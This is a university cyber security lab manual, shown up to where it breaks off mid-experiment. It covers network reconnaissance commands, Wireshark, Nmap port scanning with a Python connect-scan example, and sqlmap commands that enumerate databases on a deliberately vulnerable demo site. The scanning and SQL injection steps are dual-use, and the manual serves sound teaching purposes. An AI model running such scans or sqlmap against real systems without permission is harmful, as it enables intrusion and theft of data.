CS Lab Manual-updated.docx

The document outlines the curriculum for a Cyber Security Laboratory course within the Electronics and Computer Science UG program, detailing its vision, mission, educational objectives, and outcomes. It includes course objectives, a detailed syllabus with modules on cyber crime, attack techniques, and web/network security, as well as practical lab components and assessment methods. The document also specifies the course evaluation criteria and provides guidelines for both students and faculty involved in the course.

Uploaded by: Vidya Gogate

UG Program in Electronics and Computer Science

Name: __________________________
Roll No: __________________________
Academic Year: 20___ - 20___

Semester VII
Final Year

Electronics and Computer Science

Cyber Security
Laboratory
(ECDLOLR07043)

Institute

Vision: To become a globally recognized institution offering quality education and enhancing professional standards.

Mission: To impart high-quality technical education to the students by providing an excellent academic environment, well-equipped laboratories and training through motivated teachers.

Department

Vision: Impart quality education in Electronics and Computer Science engineering to create world class technocrats and entrepreneurs to meet industry standards.

Mission:
M1: To deliver quality academic programs in electronics and computer science engineering.
M2: To develop skilled professionals capable of providing electronics and computer-based solutions, giving emphasis to R&D for meeting industrial challenges.
M3: To improve employability and entrepreneurship of electronics and computer science engineers with an ethical and professional approach.

Program Educational Objectives (PEOs)

PEO1: To develop a strong foundation of engineering fundamentals to build successful careers maintaining high ethical standards.
PEO2: To equip graduates to pursue higher studies and research activities while accomplishing lifetime learning.
PEO3: To inculcate team spirit and leadership qualities in graduates with the ability to become entrepreneurs in multi-disciplinary fields recognized globally.

Program Specific Outcomes (PSOs)

PSO1: Students will be able to analyze real world problems, design and develop financially viable and ethical solutions based on electronics and computer science.
PSO2: Students will be able to work professionally for the benefit of society and pursue research and higher studies.

PROGRAM OUTCOMES: (POs)

1. Engineering knowledge: Apply the knowledge of mathematics, science, engineering fundamentals, and an engineering
specialization to the solution of complex engineering problems.

2. Problem analysis: Identify, formulate, review research literature, and analyze complex engineering problems reaching
substantiated conclusions using first principles of mathematics, natural sciences, and engineering sciences.

3. Design/development of solutions: Design solutions for complex engineering problems and design system components
or processes that meet the specified needs with appropriate consideration for the public health and safety, and the
cultural, societal, and environmental considerations.

4. Conduct investigations of complex problems: Use research-based knowledge and research methods including design
of experiments, analysis and interpretation of data, and synthesis of the information to provide valid conclusions.

5. Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern engineering and IT tools
including prediction and modeling to complex engineering activities with an understanding of the limitations.

6. The engineer and society: Apply reasoning informed by the contextual knowledge to assess societal, health, safety,
legal and cultural issues and the consequent responsibilities relevant to the professional engineering practice.

7. Environment and sustainability: Understand the impact of the professional engineering solutions in societal and
environmental contexts, and demonstrate the knowledge of, and need for sustainable development.

8. Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms of the engineering
practice.

9. Individual and team work: Function effectively as an individual, and as a member or leader in diverse teams, and in
multidisciplinary settings.

10. Communication: Communicate effectively on complex engineering activities with the engineering community and with
society at large, such as, being able to comprehend and write effective reports and design documentation, make effective
presentations, and give and receive clear instructions.

11. Project management and finance: Demonstrate knowledge and understanding of the engineering and management
principles and apply these to one’s own work, as a member and leader in a team, to manage projects and in
multidisciplinary environments.

12. Life-long learning: Recognize the need for and have the preparation and ability to engage in independent and life-long
learning in the broadest context of technological change.
Mapping of PSOs to POs:

PSO Number PO Number

PSO1 PO1, PO2, PO3, PO4, PO5, PO7, PO8, PO11

PSO2 PO6, PO9, PO10, PO12

Sd/-
Program Coordinator
Electronics and Computer Science Program

A Laboratory Journal for

Cyber Security Lab


(ECDLOLR07043)
Semester VII

Bachelor of Technology
(B. Tech.)
in
Electronics and Computer Science
Department
Final Year with Effect from AY: 2024 -2025

Prepared By: Dr. Asha Durafe (Assistant Professor)
Audited By: Dr. Gayatri Bachhav (Subject Expert)
Approved By: Dr. Subha Subramaniam (Head of Department), Dr. Bhavesh Patel (Principal)

Program: Final Year B.Tech.    Semester: VII

Course              | Code          | L | P | C
Cyber Security      | ECDLOCR07043  | 2 | 0 | 2
Cyber Security Lab  | ECDLOLR07043  | 0 | 2 | 1
Total               |               | 2 | 2 | 3

Course Objectives:

1 To understand the need for Cyber Security Awareness.

2 To understand the flow and methodology of an attack.

3 To learn and explore various static and web vulnerability analysis tools.

4 To understand the various IPR, privacy and security compliances.

Course Outcomes:

After successful completion of this course, the students should be able to

CO 1: Explain the need of Cyber Security and its aspects.

CO 2: Illustrate the various tools and techniques used by attackers to launch their attacks.

CO 3: Identify cyber-attacks and their countermeasures.

CO 4: Identify various web application and network vulnerability scanning techniques and defense methodologies.

Pre-requisite courses: Nil

Course Assessment Methods:


DIRECT
1. Continuous Internal Assessment (Theory component)
2. Assignments/Tutorials/Power-point presentation/Group discussion/Quiz/Seminar/Case studies/Design Thinking/Innovation/Creativity/Blog writing/Vlogging, etc.
3. Pre/Post-Experiment Test/Viva; Experimental Write-Up for each Experiment, Day-to-Day Experiments/Assignments/Tutorials/Power-point presentation/Group discussion/Quiz/Seminar/Case studies/Design Thinking/Innovation/Creativity/Blog writing/Vlogging, etc. (Lab Component)
4. End Semester Examination (Theory and Lab components).

INDIRECT
1. Course-end survey
2. Activity based survey (if any)

DETAILED SYLLABUS

Module-1: Introduction to Cyber Space 07 Hours


1.1 Cyber Crime: Cybercrime definition, Types of Cybercrime. Classifications of cybercrime, Cyber
Hygiene, Types of Hackers - Hackers and Crackers - Cyber-Attacks and Vulnerabilities - Malware threats-
Sniffing - Gaining Access - Escalating Privileges - Executing Applications - Hiding Files, Covering Tracks
- Worms - Trojans - Viruses – Backdoors
1.2 Cyber Attacks: Cyber-attack Lifecycle, social engineering, Cyber stalking, Cybercafé and
Cybercrimes, Botnets, Attack vector, Attacks on Wireless and mobile Networks
Module-2: Cyber Crime Attacks and Techniques 06 Hours
2.1 Attack Techniques: Password Cracking, Keyloggers and Spyware, Steganography, Identity Theft
(ID Theft), Banner Grabbing Techniques, Ransomware, Cryptoware.
2.2 Network information gathering, vulnerability scanning, Virtual Private Networks (VPN), Open
Port Identification, Social engineering, Types of social engineering, Prevention from being victim of social
engineering.
Module-3: Cyber Attacks and Preventions 06 Hours
3.1 Attacks on WIFI and prevention, traditional techniques, theft of internet hours, Wi-Fi measures.
3.2 Attacks on Mobile phone and prevention, mobile phone theft, mobile virus, Mishing, vishing,
smishing, hacking Bluetooth.

Module-4: Web and Network Security 07 Hours


4.1 Web Security: OWASP, Web Security Considerations, Management, Cookies, Privacy on Web, Web
Browser Attacks, Web Bugs, Clickjacking, Session Hijacking and Management, Phishing and
Pharming Techniques, Web Service Security
4.2 Network security: DOS, DDOS, defenses against Denial-of-Service Attacks. Virtual Private
Networks (VPN)

Lecture: 2 Hrs/Week Total Hours: 26 Hrs

LAB COMPONENT:
Suggested Topic of Experiments (Minimum 8 Experiments)
1. Study the use of network reconnaissance tools like WHOIS, dig, traceroute, nslookup to gather
information about networks and domain registrars.
2. Study of packet sniffer tools wireshark
3. Download and install nmap and use it with different options to scan open ports, perform OS fingerprinting,
ping scan, TCP port scan, UDP port scan.


4. Study of malicious software using different tools
5. Study of Network security by Setup of Snort and study the logs.
6. Detect SQL injection vulnerabilities in a website database using SQLMap.
7. Study of OSINT framework.
8. Penetration testing using Metasploit (Kali Linux)
9. Cross-site scripting attack.
10. Study the behavior of protections such as IDS and firewalls when altering headers in network
packets.
11. Brute force attack using Burp Suite.
One beyond curriculum experiment may be conducted (To be decided by the Subject Teacher)

Practical: 2 Hrs/Week Total Hours:26 Hrs

Textbooks:
1. Nina Godbole, Sunit Belapure, "Cyber Security: Understanding Cyber Crimes, Computer Forensics and Legal Perspectives", Wiley India, 2011.
2. Nathan House, "The Complete Cyber Security Course, Volume 1".
3. Eric Cole, "Network Security Bible", Second Edition, Wiley.
Reference Books:
1. The Information Technology Act, 2000; Bare Act, Professional Book Publishers, New Delhi.
2. James Graham, Richard Howard, Ryan Olson, "Cyber Security Essentials", CRC Press, 2018.
3. Michael Gregg, "Build Your Own Security Lab", Wiley India.
4. Dieter Gollmann, "Computer Security", Third Edition, Wiley.

Course Code: ECDLOLR07043    Lab Name: Cyber Security Lab    Credits: 1

Continuous Internal Assessment Practical (CIAP):

CIAP will be assessed for 50 marks on the following rubrics and scaled down to 10 marks:

1. 5 marks: Evaluation of write-up on day-to-day experiment in the laboratory (in terms of aim, components/procedure, expected outcome).
2. 40 marks: The Course In-charge will choose any two of the following components, each having a weightage of 20 marks: Assignments/Tutorials/Power point presentation/Group discussion/Quiz/Seminar/Case studies/Design Thinking/Innovation/Creativity/Project/App development.
3. 5 marks: Attendance.

End Semester Examination (ESEP)

Based on the above contents and the entire syllabus of ECDLOCR07043.

1. The End Semester Examination Practical shall be conducted for 100 marks for a duration of three hours and scaled down to 15 marks.



Evaluation Method: Continuous Internal Assessment (CIAP) + End Semester Examination (ESEP)
Passing Requirement: Obtained marks at least 40 % of maximum marks

Course Outcomes (CO)

CO No. | CO Statement (At the end of the course, students will be able to ...)                                    | BL
1      | Explain the need of Cyber Security and its aspects.                                                      | 3
2      | Illustrate the various tools and techniques used by attackers to launch their attacks.                   | 4
3      | Identify cyber-attacks and their countermeasures.                                                        | 1
4      | Identify various web application and network vulnerability scanning techniques and defense methodologies. | 1

List of Experiments

Sr. No. | Title                                                             | CO | PO               | PSO
1       | Network reconnaissance tools                                      | 1  | 1,2,5,6,8,12     | 1,2
2       | Packet sniffer tools in Wireshark                                 | 1  | 1,2,5,6,8,12     | 1,2
3       | Network Discovery tools                                           | 2  | 1,2,5,6,8,12     | 1,2
4       | SQL injection vulnerabilities in a website database using SQLMap  | 2  | 1,2,5,6,8,12     | 1,2
5       | OSINT framework                                                   | 2  | 1,2,5,6,8,12     | 1,2
6       | ARP poisoning attack in Ettercap                                  | 3  | 1,2,5,6,8,12     | 1,2
7       | Cross-site scripting attack                                       | 3  | 1,2,5,6,8,12     | 1,2
8       | IDS and firewalls                                                 | 4  | 1,2,5,6,8,12     | 1,2
9       | CTF challenges and practice (beyond curriculum experiment)        | 4  | 1,2,3,4,5,6,8,12 | 1,2
10      | Mini Project / Case Studies / Problem Statement / Certifications  | 4  | 1,2,3,4,5,6,8,12 | 1,2
Name and Signature: Date:

Subject: __________________________________
INDEX

Sr. No. | Title of Experiment/Assignment/Tutorial | Date of Performance | Date of Submission | Page No. | Marks | Initials of Teacher with Remarks

Marks
Evaluation of write-up on day-to-day experiment in the laboratory (in terms of aim, components/procedure, expected outcome): /05
Assessment Method 1: /20
Assessment Method 2: /20
Attendance: /05

This is to certify that Shri/Kum ...........................................................................................……………….


Batch.......................Roll No.............................................................Semester……………… has completed the
specified CIAP in the subject of ………………………………………..…………………………….in a satisfactory
manner in the college during the academic year of 20….. to 20……

Subject In-charge

Instructions for Students

1. For effective implementation and attainment of practical outcomes, at the beginning of each exercise students need to read through the complete write-up.
2. Students ought to refer to reference books, lab manuals, etc.
3. Students should not hesitate to ask about any difficulties they face while performing the practical.
4. Algorithms and flow graphs are to be handwritten for programming subjects.

Guidelines for Faculty

1. There will be two blank pages after every practical for the student to report other matters (if any) which are not mentioned in the printed practical.
2. For difficult practicals, if required, teachers may demonstrate the practical, emphasising the skills which the students should achieve.
3. Teachers should give students opportunities for hands-on work after the demonstration.
4. During the practical, ensure that each student gets a chance and takes an active part in taking observations/readings and performing the practical.

Cyber Security Lab (ECDLOLR07043) A.Y. 2024-25



Experiment No. – 1

Date of Performance:

Date of Submission:

Program formation/correction/ethical practices (06) | Execution/Viva (03) | Timely Submission (01) | Experiment Total (10) | Sign with Date

Experiment No. 1
Network reconnaissance tools

1.1 Aim: To use basic networking commands in Linux (ping, traceroute, nslookup, netstat, arp, ip, ifconfig, dig, route) and interpret their output. Note that tracert is the Windows name of traceroute, and that modern Linux no longer ships a separate rarp utility; the neighbour (ARP) table is read with arp or ip neigh.

1.2 Course Outcome: Explain the need for Cyber Security and its aspects.

1.3 Learning Objectives: Explain the various commands involved in network reconnaissance.

1.4 Requirement: Kali Linux

1.5 Related Theory:


ifconfig command:
ifconfig (from the net-tools package) displays the current configuration of the network interfaces and can assign an address and netmask to an interface or bring it up or down. For each interface it shows the MAC address, the IPv4/IPv6 addresses and packet counters, which is the first thing to record when enumerating a host. On current Linux distributions it is a legacy tool: the same information comes from ip addr and ip link (iproute2), and the address of each interface is normally set at boot by the network manager or DHCP rather than by running ifconfig by hand. Changes made with ifconfig are not persistent across reboots.

Netstat command:
The netstat command displays information about the configured network interfaces and the sockets open on the host, such as the following:
● Open TCP and UDP sockets with their local and remote addresses and their state (LISTEN, ESTABLISHED, TIME_WAIT, ...)
● The number of packets received, transmitted, and dropped in the communications subsystem (netstat -i, netstat -s)
● Cumulative statistics per interface
● Routes and their status (netstat -r)
For reconnaissance of a host the most useful invocation is netstat -tulnp, which lists the listening TCP and UDP sockets with numeric ports and the owning process. On modern Linux, ss -tulnp from iproute2 gives the same information and is the maintained replacement.

Figure 1.1 Implementation of ifconfig command

Assign the IP address and netmask

Figure 1.2 Assign the IP address and netmask


Figure 1.3 Netstat command

Figure 1.4 Netstat command


Figure 1.5 Netstat command

Figure 1.6 Netstat command
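As an added example (not part of the original manual), the following Python script parses netstat -tulnp style output and reports which listening services are reachable from other hosts, which is the question a reconnaissance exercise ultimately asks of the netstat figures above. The sample output embedded in the script is constructed for illustration, not captured from a real system; on a live machine you would feed it the real output, e.g. netstat -tulnp | python3 listeners.py (the script name is an assumption).

```python
import sys
from dataclasses import dataclass

# Constructed sample of `netstat -tulnp` output (not taken from a real host).
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1043/mysqld
tcp6       0      0 :::80                   :::*                    LISTEN      1200/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           700/dhclient
udp        0      0 127.0.0.53:53           0.0.0.0:*                           455/systemd-resolve
"""

WILDCARD = {"0.0.0.0", "::", "*"}
LOOPBACK = {"127.0.0.1", "::1"}


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    program: str

    @property
    def scope(self) -> str:
        """Where the socket is reachable from, derived from its bind address."""
        if self.addr in WILDCARD:
            return "all interfaces"
        if self.addr in LOOPBACK or self.addr.startswith("127."):
            return "loopback only"
        return "one interface"


def parse_netstat(text: str) -> list:
    """Extract listening sockets from `netstat -tulnp` output (TCP rows in LISTEN state, all UDP rows)."""
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or not parts[0].startswith(("tcp", "udp")):
            continue                                   # header and blank lines
        proto, local = parts[0], parts[3]
        addr, _, port = local.rpartition(":")          # rpartition keeps the IPv6 ':::80' form intact
        if proto.startswith("tcp"):
            if "LISTEN" not in parts:
                continue                               # established/time-wait rows are not services
            program = parts[6] if len(parts) > 6 else "-"
        else:
            program = parts[5] if len(parts) > 5 else "-"   # UDP rows have no State column
        listeners.append(Listener(proto, addr, int(port), program))
    return listeners


def externally_reachable(text: str) -> dict:
    """Map 'proto/port' -> program for every listener bound to a wildcard address."""
    return {f"{l.proto}/{l.port}": l.program
            for l in parse_netstat(text) if l.scope == "all interfaces"}


if __name__ == "__main__":
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_NETSTAT
    for l in parse_netstat(data):
        print(f"{l.proto:5} {l.port:>5}  {l.program:<20} {l.scope}")
```

The distinction the script makes, wildcard bind versus loopback bind, is what decides whether a service found in netstat output is part of the host's network attack surface or only reachable by local processes.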


traceroute command

Figure 1.7 traceroute command

nslookup command:

Figure 1.8 nslookup command


ARP:

Figure 1.9 arp command

Dig:

Figure 1.10 dig command

1.6 Procedure:

a) Execute all the commands listed above and observe the output.
b) Run each command with different options and note down the differences in the output.

1.7 Command and Output:


1.8 Conclusion:
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
1.9 Questions:
1. The __________ command can show address information, manipulate routing, and display various network devices, interfaces, and tunnels.
2. The _____________ command is designed for capturing and displaying packets.
3. The ______________ tool is used for printing network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
4. The ______________ utility is used to query Internet name servers interactively.
5. __________ is a tool that verifies IP-level connectivity to another TCP/IP computer by sending Internet Control Message Protocol (ICMP) Echo Request messages.


Experiment No. – 2

Date of Performance:

Date of Submission:

Program formation/correction/ethical practices (06) | Execution/Viva (03) | Timely Submission (01) | Experiment Total (10) | Sign with Date

Experiment No. 2
Packet sniffer tools in Wireshark

2.1 Aim: Use the packet sniffing tool Wireshark to understand the operation of the TCP/IP layers.

2.2 Course Outcome: Explain the need for Cyber Security and its aspects.

2.3 Learning Objectives: Use Wireshark to explore networking algorithms and protocols.

2.4 Requirement: Kali Linux

2.5 Related Theory:

Wireshark:
Wireshark is a network protocol analyser: an application that captures the packets passing over a network interface, such as the link from your computer to the office LAN or the internet, and decodes them protocol by protocol. A packet is a discrete unit of data on the network; on Ethernet each frame carries an IP packet, which in turn carries a TCP or UDP segment, and Wireshark shows each of these layers separately.

Wireshark is the most widely used packet sniffer. Like any packet sniffer, Wireshark does three things:

Packet Capture: Wireshark listens on a network interface in real time (in promiscuous mode, which on Linux requires root or membership of the wireshark group) and records entire streams of traffic, quite possibly tens of thousands of packets in one session.

Filtering: Wireshark can slice this raw traffic with capture filters (BPF syntax, applied before packets are stored, e.g. port 80) and display filters (applied to packets already captured, e.g. http.request or ip.src == 192.168.1.10). By applying a filter you obtain just the packets you need to see.

Visualization: Wireshark lets you open any packet down to the individual header field, and can reassemble whole conversations and streams (Follow TCP Stream). Captured traffic may contain credentials and personal data, so capture only on networks you are authorised to monitor and handle the capture files accordingly.

Figure 2.1 Wireshark


Figure 2.2 Viewing a packet capture in Wireshark


Figure 2.3 Drilling down into a packet to identify a network problem using Wireshark


Figure 2.4 Drilling down into a packet to identify a network problem using Wireshark

Figure 2.5 Applying filter
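As an added example (not code from the manual or from the Wireshark project), the Python script below does by hand what Wireshark's packet-details pane does in the figures above: it unpacks an Ethernet frame into its Ethernet, IPv4 and TCP headers, verifies the IPv4 header checksum, and evaluates a display-filter expression against the decoded fields. The frame is constructed inside the script (a TCP SYN to port 80) rather than taken from a capture; the field names follow Wireshark's ip.src / tcp.dstport convention so that the filter syntax carries over.

```python
import struct

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
IPV4_HDR = struct.Struct("!BBHHHBBH4s4s")  # 20-byte fixed IPv4 header
TCP_HDR = struct.Struct("!HHIIBBHHH")      # 20-byte fixed TCP header
TCP_FLAGS = ((0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
             (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG"))


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum of 16-bit words; the caller zeroes the checksum field first."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_frame(frame: bytes) -> dict:
    """Decode Ethernet -> IPv4 -> TCP the way Wireshark's details pane does, one dict entry per layer."""
    dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    layers = {"eth": {"dst": dst.hex(":"), "src": src.hex(":"), "type": ethertype}}
    if ethertype != 0x0800:                      # not IPv4: stop after the link layer
        return layers
    off = ETH_HDR.size
    vihl, _tos, total_len, ident, _ff, ttl, proto, csum, s, d = IPV4_HDR.unpack_from(frame, off)
    ihl = (vihl & 0x0F) * 4                      # header length in bytes (options included)
    hdr = frame[off:off + ihl]
    layers["ip"] = {
        "src": ".".join(map(str, s)), "dst": ".".join(map(str, d)),
        "ttl": ttl, "proto": proto, "id": ident, "len": total_len,
        # recompute with the checksum bytes (offsets 10-11) zeroed and compare with the wire value
        "checksum_ok": ipv4_checksum(hdr[:10] + b"\x00\x00" + hdr[12:]) == csum,
    }
    if proto != 6:                               # not TCP
        return layers
    off += ihl
    sport, dport, seq, ack, doff, flags, win, _csum, _urg = TCP_HDR.unpack_from(frame, off)
    data_off = (doff >> 4) * 4                   # TCP header length in bytes
    layers["tcp"] = {
        "srcport": sport, "dstport": dport, "seq": seq, "ack": ack, "window": win,
        "flags": [name for bit, name in TCP_FLAGS if flags & bit],
        "payload": frame[off + data_off: ETH_HDR.size + total_len],
    }
    return layers


def matches(layers: dict, expr: str) -> bool:
    """Tiny subset of Wireshark display-filter syntax: 'proto.field == value'."""
    field, value = (part.strip() for part in expr.split("==", 1))
    proto, name = field.split(".", 1)
    actual = layers.get(proto, {}).get(name)
    return actual is not None and str(actual) == value


def build_sample_frame(payload: bytes = b"") -> bytes:
    """Constructed test frame (not a real capture): TCP SYN 192.168.1.10:51234 -> 93.184.216.34:80."""
    tcp = TCP_HDR.pack(51234, 80, 0x1000, 0, 5 << 4, 0x02, 64240, 0, 0)
    total_len = IPV4_HDR.size + len(tcp) + len(payload)
    src, dst = bytes([192, 168, 1, 10]), bytes([93, 184, 216, 34])
    fields = [0x45, 0, total_len, 0x1234, 0x4000, 64, 6, 0, src, dst]
    fields[7] = ipv4_checksum(IPV4_HDR.pack(*fields))    # fill in the header checksum
    eth = ETH_HDR.pack(bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), 0x0800)
    return eth + IPV4_HDR.pack(*fields) + tcp + payload


if __name__ == "__main__":
    decoded = parse_frame(build_sample_frame(b"GET / HTTP/1.0\r\n"))
    for layer, fields in decoded.items():
        print(layer, fields)
    print("tcp.dstport == 80 ->", matches(decoded, "tcp.dstport == 80"))
```

Parsing the header lengths from the IHL and data-offset fields, rather than assuming 20 bytes, is what keeps the decoder correct when IP or TCP options are present; the checksum recomputation is the same check behind Wireshark's "Header checksum: incorrect" warning.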


2.6 Simulated Output:

2.7 Conclusion:

……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
2.8 Questions:

1. Wireshark used to be known as ___________.


2. The ___________ Wireshark filter can be used to check all incoming requests to an HTTP web server.
3. The ____________ Wireshark filter can be used to monitor outgoing packets from a specific system on the network.


Experiment No. – 3

Date of Performance:

Date of Submission:

Program formation/correction/ethical practices (06) | Execution/Viva (03) | Timely Submission (01) | Experiment Total (10) | Sign with Date

Experiment No. 3
Network Discovery tools

3.1 Aim: Perform network discovery using a discovery tool such as Nmap.

3.2 Course Outcome: Illustrate the various tools and techniques used by attackers to launch their attacks.

3.3 Learning Objectives: Network discovery using Nmap.

3.4 Requirement: Kali Linux

3.5 Related Theory:

Nmap (“Network Mapper”) is an open-source tool for network exploration and security auditing. It
was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses
raw IP packets in novel ways to determine what hosts are available on the network, what services
(application name and version) those hosts are offering, what operating systems (and OS versions)
they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
While Nmap is commonly used for security audits, many systems and network administrators find it
useful for routine tasks such as network inventory, managing service upgrade schedules, and
monitoring host or service uptime.

The output from Nmap is a list of scanned targets, with supplemental information on each depending
on the options used. Key to that information is the “interesting ports table”. That table lists the port
number and protocol, service name, and state. The state is either open, filtered, closed, or unfiltered.
Open means that an application on the target machine is listening for connections/packets on that port.
Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap
cannot tell whether it is open or closed. Closed ports have no application listening on them, though
they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's
probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state
combinations open|filtered and closed|filtered when it cannot determine which of the two states
describe a port. The port table may also include software version details when version detection has
been requested. When an IP protocol scan is requested (-sO), Nmap provides information on
supported IP protocols rather than listening ports.
In addition to the interesting ports table, Nmap can provide further information on targets, including
reverse DNS names, operating system guesses, device types, and MAC addresses. Scan only hosts and
networks you own or have written permission to test; an unsolicited port scan of third-party systems
may be treated as unauthorised access.
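The port states described above can be reproduced without Nmap. The following Python script is an added example, not part of the manual or of Nmap itself: it performs the equivalent of nmap -sT (a full TCP connect per port, which needs no raw-socket privileges, unlike the default -sS SYN scan), classifies each port as open, closed or filtered from how the connection attempt fails, and grabs a service banner the way version detection starts. To stay self-contained it starts its own throwaway listener on 127.0.0.1 with a made-up SSH-style banner; the function names and the banner string are this example's own.

```python
import errno
import socket
import threading


def start_demo_listener(banner: bytes = b"SSH-2.0-OpenSSH_demo\r\n"):
    """Bind a listener on 127.0.0.1:<ephemeral> and serve `banner` to every client from a daemon thread.
    Returns (server_socket, port). The banner is made up for this demo."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:                      # listener closed: stop serving
                return
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:                  # client already went away (a bare scan does that)
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def free_port() -> int:
    """Reserve and release an ephemeral port so we have a port that is known to be closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def tcp_connect_scan(host: str, ports, timeout: float = 0.5) -> dict:
    """Equivalent of `nmap -sT`: one full three-way handshake per port, mapped to Nmap's port states."""
    states = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                states[port] = "open"            # SYN/ACK received, handshake completed
            except socket.timeout:
                states[port] = "filtered"        # neither SYN/ACK nor RST: something dropped the SYN
            except ConnectionRefusedError:
                states[port] = "closed"          # RST received: host is up, nothing listening
            except OSError as e:
                unreachable = e.errno in (errno.EHOSTUNREACH, errno.ENETUNREACH)
                states[port] = "filtered" if unreachable else "closed"
    return states


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Version detection in its simplest form: connect and read whatever the service volunteers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(256)
        except socket.timeout:                   # silent service: Nmap would start sending probes here
            return ""
    return data.decode("ascii", "replace").strip()


if __name__ == "__main__":
    srv, open_port = start_demo_listener()
    closed_port = free_port()
    print(tcp_connect_scan("127.0.0.1", [open_port, closed_port]))
    print("banner on", open_port, "->", grab_banner("127.0.0.1", open_port))
    srv.close()
```

A connect scan completes the handshake, so every probe shows up in the target's application logs; the SYN scan Nmap runs by default as root tears the connection down after the SYN/ACK and is quieter, which is why the two are distinguished in the options table.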

Figure 3.1 Installing nmap


Figure 3.2 Running nmap

Figure 3.3 Running nmap in different modes


Figure 3.4 Running nmap in different modes

3.6 Command Listing and Output:

3.7 Conclusion:
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
……………………………………………………………………………………………
3.8 Questions:

1. nmap -sP 192.100.1.1/24: this command is used to perform a ________ scan (in current Nmap releases -sP is a deprecated alias of -sn).
2. The command for a ping scan is: ___________
3. nmap -p 80,443 192.168.1.100: in this command, the number 80 denotes the __________.


Experiment No. – 4

Date of Performance:

Date of Submission:

Program formation/correction/ethical practices (06) | Execution/Viva (03) | Timely Submission (01) | Experiment Total (10) | Sign with Date

Experiment No. 4
SQL injection vulnerabilities in a website database
using SQLMap.

4.1 Aim: Detect SQL injection vulnerabilities in a website database using sqlmap.

4.2 Course Outcome: Illustrate the various tools and techniques used by attackers to launch their attacks.

4.3 Learning Objectives: Detect SQL injection.

4.4 Requirement: Kali Linux

4.5 Related Theory:

SQL injection (SQLi) is an injection attack in which an attacker can execute malicious SQL statements (commonly referred to as a malicious payload) that control a web application's database server (commonly a Relational Database Management System, RDBMS). It occurs when untrusted input, typically a URL parameter, form field, cookie or header, is concatenated into a SQL statement instead of being passed as a bound parameter. Since the vulnerability can affect any website or web application that uses a SQL database, it is one of the oldest, most prevalent and most dangerous web application vulnerabilities.

By leveraging a SQL injection vulnerability, given the right circumstances, an attacker can bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQL injection can also be used to add, modify and delete records in a database, affecting data integrity.

To that extent, SQL injection can give an attacker unauthorized access to sensitive data including customer data, personally identifiable information (PII), trade secrets, intellectual property and other confidential information.

sqlmap: sqlmap is an open source penetration testing tool, preinstalled in Kali Linux, that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the penetration tester and a broad range of switches ranging from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

4.6 Procedure:
Step 1: Open the package

Boot into your Kali Linux machine. Start a terminal and type:
sqlmap -h
It lists the basic options supported by sqlmap. To start with, we will run the simplest form:
sqlmap -u <URL to inject>
The target used throughout this experiment is Acunetix's deliberately vulnerable demo site, which is published for exactly this kind of practice; never point sqlmap at a site you do not own or have written permission to test. In our case the command is:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

Quote the URL so the shell does not interpret the ? and & characters. When the server responds slowly, raising --time-sec (the delay sqlmap injects for time-based blind tests, 5 seconds by default) makes detection more reliable, at the cost of a longer run:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --time-sec 15


Figure 4.1 Running sqlmap

Note: Depending on a number of factors, sqlmap may ask yes/no questions while it runs. Typing y means yes and n means no. Typical questions you will come across:

● sqlmap reports that the back-end DBMS is probably MySQL and asks whether to skip tests for other DBMSes and run MySQL tests only. Answer yes (y).
● sqlmap asks whether to include tests for specific MySQL versions (extending the payload set). The answer depends on the situation; if you are unsure, it is usually better to say yes.

Step 2: Database

In this step we will obtain the database names, then the table and column names, and finally the data itself. First we get the names of the available databases by adding --dbs to the previous command:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Figure 4.2 step 2


Figure 4.3 step 3


Step 3: Tables

